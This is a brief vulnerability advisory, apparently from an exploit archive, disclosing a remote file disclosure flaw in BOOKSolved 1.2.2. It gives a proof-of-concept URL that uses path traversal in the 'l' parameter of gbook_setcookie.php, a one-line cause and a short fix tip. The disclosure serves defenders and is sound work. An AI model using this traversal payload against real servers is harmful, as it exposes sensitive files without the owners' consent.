BOOKSolved version 1.2.2 suffers from a remote file disclosure vulnerability.
2363b1d768db868735c44eca0b6cd0208d7394bf6f2a6bdd7b17441aaea823a0
...BOOKSolved 1.2.2 (l) Remote File Disclosure Vulnerability
...Discovered by bd0rk
...Contact: bd0rk[at]hackermail.com or follow me on twitter
...Greetz: inj3ct0r-Team, x0r_32, Perle, Siber King
...Tested on: Ubuntu-Linux
...MEZ-Time: 08:17
...Vendor: http://www.usolved.net/
...Download: http://www.usolved.net/scripts/booksolved_v1.2.2.zip
----------------------------------------------------------------------------
PoC: http://[targethost]/[path]/inc/gbook_setcookie.php?l=../../R3adIn.php
----------------------------------------------------------------------------
Description: Found vulnerable code in gbook_setcookie.php line 7.
So an attacker can read in sensitive files about l-parameter.
bd0rk's-Fixtip: Percolate the l-parameter before $_GET
Greetings from Germany, the 22 years old bd0rk.